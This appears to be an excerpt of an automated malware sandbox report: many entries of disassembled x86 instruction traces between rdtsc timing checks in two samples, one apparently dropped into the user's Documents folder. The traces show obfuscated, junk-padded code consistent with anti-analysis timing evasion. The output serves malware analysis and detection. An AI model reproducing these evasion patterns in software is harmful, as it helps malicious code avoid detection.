Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5078C second address: 4F50819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edi 0x0000000a jmp 00007FF0EC6B64D0h 0x0000000f test al, al 0x00000011 pushad 0x00000012 mov si, 146Dh 0x00000016 jmp 00007FF0EC6B64CAh 0x0000001b popad 0x0000001c jne 00007FF15CCCE784h 0x00000022 pushad 0x00000023 jmp 00007FF0EC6B64CEh 0x00000028 popad 0x00000029 mov ecx, edx 0x0000002b jmp 00007FF0EC6B64D7h 0x00000030 shr ecx, 02h 0x00000033 jmp 00007FF0EC6B64D6h 0x00000038 rep movsd 0x0000003a rep movsd 0x0000003c rep movsd 0x0000003e rep movsd 0x00000040 rep movsd 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FF0EC6B64CAh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50819 second address: 4F50828 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50828 second address: 4F508AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF0EC6B64CFh 0x00000008 pop eax 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ecx, edx 0x00000011 jmp 00007FF0EC6B64CBh 0x00000016 and ecx, 03h 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FF0EC6B64D4h 0x00000020 and esi, 3D6926B8h 0x00000026 jmp 00007FF0EC6B64CBh 0x0000002b popfd 0x0000002c push eax 0x0000002d mov ecx, edi 0x0000002f pop edi 0x00000030 popad 0x00000031 rep movsb 0x00000033 jmp 00007FF0EC6B64CEh 0x00000038 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000003f jmp 00007FF0EC6B64D0h 0x00000044 mov eax, ebx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 movzx eax, dx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F508AD second address: 4F508DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF0EC517C85h 0x0000000c jmp 00007FF0EC517C7Bh 0x00000011 popfd 0x00000012 popad 0x00000013 mov ecx, dword ptr [ebp-10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F508DF second address: 4F508E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F508E5 second address: 4F5094A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], ecx 0x00000010 jmp 00007FF0EC517C80h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jmp 00007FF0EC517C7Eh 0x0000001c pushfd 0x0000001d jmp 00007FF0EC517C82h 0x00000022 and ax, 2A98h 0x00000027 jmp 00007FF0EC517C7Bh 0x0000002c popfd 0x0000002d popad 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov dx, C986h 0x00000036 push edi 0x00000037 pop eax 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5094A second address: 4F50980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0EC6B64D7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50980 second address: 4F50524 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 jmp 00007FF0EC517C80h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF0EC517C7Eh 0x00000015 jmp 00007FF0EC517C85h 0x0000001a popfd 0x0000001b mov esi, 35FA5CD7h 0x00000020 popad 0x00000021 leave 0x00000022 pushad 0x00000023 mov ah, 0Fh 0x00000025 jmp 00007FF0EC517C85h 0x0000002a popad 0x0000002b retn 0008h 0x0000002e cmp dword ptr [ebp-2Ch], 10h 0x00000032 mov eax, dword ptr [ebp-40h] 0x00000035 jnc 00007FF0EC517C75h 0x00000037 push eax 0x00000038 lea edx, dword ptr [ebp-00000590h] 0x0000003e push edx 0x0000003f call esi 0x00000041 push 00000008h 0x00000043 pushad 0x00000044 movsx ebx, si 0x00000047 mov si, 4EBFh 0x0000004b popad 0x0000004c push 08E154FDh 0x00000051 jmp 00007FF0EC517C7Bh 0x00000056 xor dword ptr [esp], 7DBF48D5h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50B55 second address: 4F50B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0EC6B64CEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50B7C second address: 4F50C8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF0EC517C84h 0x00000011 adc ax, 0FC8h 0x00000016 jmp 00007FF0EC517C7Bh 0x0000001b popfd 0x0000001c call 00007FF0EC517C88h 0x00000021 pushfd 0x00000022 jmp 00007FF0EC517C82h 0x00000027 adc ecx, 16035558h 0x0000002d jmp 00007FF0EC517C7Bh 0x00000032 popfd 0x00000033 pop ecx 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FF0EC517C85h 0x0000003e and ecx, 767C08F6h 0x00000044 jmp 00007FF0EC517C81h 0x00000049 popfd 0x0000004a pushfd 0x0000004b jmp 00007FF0EC517C80h 0x00000050 sbb ecx, 1D3A1A18h 0x00000056 jmp 00007FF0EC517C7Bh 0x0000005b popfd 0x0000005c popad 0x0000005d pop ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 call 00007FF0EC517C7Bh 0x00000066 pop esi 0x00000067 pushfd 0x00000068 jmp 00007FF0EC517C89h 0x0000006d and esi, 33A35E66h 0x00000073 jmp 00007FF0EC517C81h 0x00000078 popfd 0x00000079 popad 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50C8A second address: 4F50C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50C9A second address: 4F50C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: 9BED6A second address: 9BED7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64CCh 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B37FCC second address: B37FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B370A5 second address: B370AF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0EC6B64C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B37607 second address: B3760D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3760D second address: B37613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B37613 second address: B37620 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B37620 second address: B37630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B378DC second address: B378E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B378E7 second address: B378F3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF0EC6B64CEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B378F3 second address: B37924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF0EC517C88h 0x0000000f jmp 00007FF0EC517C7Fh 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B37924 second address: B3792A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3792A second address: B3793C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FF0EC517C7Ch 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B377 second address: B3B40C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF0EC6B64C8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007FF0EC6B64CDh 0x00000018 pop eax 0x00000019 push esi 0x0000001a jmp 00007FF0EC6B64D6h 0x0000001f pop edi 0x00000020 push 00000003h 0x00000022 jnl 00007FF0EC6B64CCh 0x00000028 push 00000000h 0x0000002a mov edx, dword ptr [ebp+122D1CAFh] 0x00000030 push 00000003h 0x00000032 jmp 00007FF0EC6B64D6h 0x00000037 mov dword ptr [ebp+122D3228h], edx 0x0000003d call 00007FF0EC6B64C9h 0x00000042 jmp 00007FF0EC6B64D9h 0x00000047 push eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B40C second address: B3B489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0EC517C88h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FF0EC517C82h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jnp 00007FF0EC517C7Eh 0x0000001d push esi 0x0000001e jnc 00007FF0EC517C76h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 je 00007FF0EC517C88h 0x0000002f pushad 0x00000030 jmp 00007FF0EC517C7Ah 0x00000035 jns 00007FF0EC517C76h 0x0000003b popad 0x0000003c pop eax 0x0000003d mov dword ptr [ebp+122D1C3Ah], ecx 0x00000043 lea ebx, dword ptr [ebp+12450150h] 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c ja 00007FF0EC517C7Ch 0x00000052 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B653 second address: B3B662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64CBh 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B662 second address: B3B688 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF0EC517C85h 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B688 second address: B3B69C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B69C second address: B3B6E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C84h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FF0EC517C78h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a call 00007FF0EC517C79h 0x0000002f pushad 0x00000030 push ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B6E5 second address: B3B728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jnc 00007FF0EC6B64C6h 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007FF0EC6B64D7h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007FF0EC6B64CDh 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 ja 00007FF0EC6B64C6h 0x00000029 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B728 second address: B3B72E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B72E second address: B3B7F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007FF0EC6B64D8h 0x00000012 pop eax 0x00000013 pushad 0x00000014 mov dword ptr [ebp+122D2CB3h], ecx 0x0000001a mov edi, 51D9B0A6h 0x0000001f popad 0x00000020 push 00000003h 0x00000022 pushad 0x00000023 add si, 1665h 0x00000028 movzx eax, di 0x0000002b popad 0x0000002c push 00000000h 0x0000002e call 00007FF0EC6B64D1h 0x00000033 mov ecx, eax 0x00000035 pop esi 0x00000036 push 00000003h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FF0EC6B64C8h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 call 00007FF0EC6B64C9h 0x00000057 jmp 00007FF0EC6B64D3h 0x0000005c push eax 0x0000005d je 00007FF0EC6B64CEh 0x00000063 jnc 00007FF0EC6B64C8h 0x00000069 mov eax, dword ptr [esp+04h] 0x0000006d pushad 0x0000006e jmp 00007FF0EC6B64CBh 0x00000073 jbe 00007FF0EC6B64CCh 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B3B7F6 second address: B3B868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push edi 0x00000008 jno 00007FF0EC517C78h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007FF0EC517C88h 0x00000018 pop eax 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FF0EC517C78h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 jmp 00007FF0EC517C7Ch 0x00000038 lea ebx, dword ptr [ebp+12450164h] 0x0000003e pushad 0x0000003f push edi 0x00000040 xor di, 9231h 0x00000045 pop edx 0x00000046 stc 0x00000047 popad 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push edi 0x0000004c je 00007FF0EC517C76h 0x00000052 pop edi 0x00000053 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B313A6 second address: B313AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B313AC second address: B313B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B58F67 second address: B58F86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5938D second address: B59391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59391 second address: B59395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B594F0 second address: B59501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C7Dh 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59501 second address: B5951E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59805 second address: B59816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF0EC517C76h 0x00000009 jl 00007FF0EC517C76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59816 second address: B5983D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jnc 00007FF0EC6B64C6h 0x00000010 jmp 00007FF0EC6B64D6h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B599BB second address: B599BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B599BF second address: B599D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B599D8 second address: B599DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B599DC second address: B599FA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0EC6B64C6h 0x00000008 jmp 00007FF0EC6B64D4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B599FA second address: B59A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF0EC517C76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59A06 second address: B59A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59A0A second address: B59A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59D00 second address: B59D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59D04 second address: B59D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FF0EC517C7Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59D14 second address: B59D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FF0EC6B64C6h 0x0000000f rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59D23 second address: B59D45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF0EC517C7Ch 0x0000000e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59D45 second address: B59D7A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0EC6B64D0h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF0EC6B64CFh 0x0000000f jmp 00007FF0EC6B64D2h 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59EF5 second address: B59F4D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0EC517C76h 0x00000008 jmp 00007FF0EC517C7Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FF0EC517C81h 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 jmp 00007FF0EC517C89h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jnc 00007FF0EC517C76h 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B59F4D second address: B59F53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B2A655 second address: B2A65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B2A65B second address: B2A661 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B2A661 second address: B2A676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C80h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5AAD4 second address: B5AADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5E4B0 second address: B5E4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5E4B4 second address: B5E4CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push ebx 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5E4CA second address: B5E4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c jnc 00007FF0EC517C76h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5E4E0 second address: B5E50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jbe 00007FF0EC6B64CEh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF0EC6B64CFh 0x00000019 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5E50B second address: B5E521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C81h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5E784 second address: B5E78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF0EC6B64C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5F9F1 second address: B5F9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
